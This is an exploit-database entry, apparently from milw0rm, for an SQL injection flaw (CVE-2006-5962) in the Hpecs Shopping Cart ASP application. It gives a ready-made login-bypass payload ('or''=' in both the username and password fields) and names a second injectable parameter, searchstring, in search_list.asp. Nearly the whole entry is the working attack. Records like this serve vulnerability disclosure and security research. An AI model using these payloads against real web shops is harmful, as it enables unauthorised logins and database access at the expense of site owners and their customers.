Hpecs Shopping Cart - Remote Authentication Bypass
Author: Security Access Point type: webapps platform: asp port: date_added: 2006-11-13 date_updated: 2016-09-14 verified: 1 codes: CVE-2006-5962 tags: aliases: screenshot_url: application_url: raw file: 2782.txt
vendor site:http://hpe.net/ product:hpecs shopping cart bug:injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (post) : http://site.com/search_list.asp variables: Hpecs_Find=maingroup&searchstring='[sql] ( or just post your query in the search engine ... ) laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com # milw0rm.com [2006-11-14]